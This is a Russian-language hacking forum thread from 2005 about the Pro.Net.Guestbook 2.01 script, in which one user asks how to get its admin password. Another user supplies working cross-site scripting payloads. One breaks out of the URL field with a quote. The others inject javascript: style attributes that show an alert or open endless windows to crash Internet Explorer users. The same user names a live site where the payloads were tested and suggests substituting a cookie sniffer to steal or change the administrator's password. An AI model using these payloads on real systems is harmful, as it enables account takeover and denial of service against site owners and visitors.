Форумы Pro.Net.Guestbook version 2.01

Discussion in 'Уязвимости CMS/форумов' started by XgLuiR, 8 Nov 2005.

  1. XgLuiR

    XgLuiR New Member

    Joined:
    7 Nov 2005
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Не кто не знает как получить пароль ? в этом скрипте
     
  2. queen

    queen Banned

    Joined:
    3 Nov 2005
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    v pole


    prohodit " kaviuchka.

    znachit pischeschi tak.

    v pole


    HTML:
    http://www.kez.com"`=`
    a v tele soobscheniya pischeschi odnovremenno sledyschee:

    HTML:
    ` style=`background:url(javaSCrip	t:alert(/Kez/))`
    A esli hotite bezchislennoe kolichestvo okoschek dati, to pischete vot tak v tele dlya messag:


    HTML:
    ` style=`background:url(javaSCrip	t:for(;;)open())`
    I pogibaet user s IE.



    Testirovalosi tyt.

    http://www.airschool.ru/cgi-bin/gb/gb.cgi
     
    #2 queen, 8 Nov 2005
    Last edited: 8 Nov 2005
  3. XgLuiR

    XgLuiR New Member

    Joined:
    7 Nov 2005
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    блин мне бы узнать как пароль от админки получить
     
  4. queen

    queen Banned

    Joined:
    3 Nov 2005
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    lol, ny vot. vmesto alerta sniffer zasyni trydno chotli
     
  5. XgLuiR

    XgLuiR New Member

    Joined:
    7 Nov 2005
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    да интересно там возмоен просмотр госевой через админку :) Сенк попробую :0
     
  6. queen

    queen Banned

    Joined:
    3 Nov 2005
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    nihera ne ponyal...


    kstati esli y admina pass ne nyzhdaetsya v starom passworde chtobiu izmeniti na noviui, to moscheschi emy password pomenyati cherez ty bagy kotoryiu Ya tebe dal.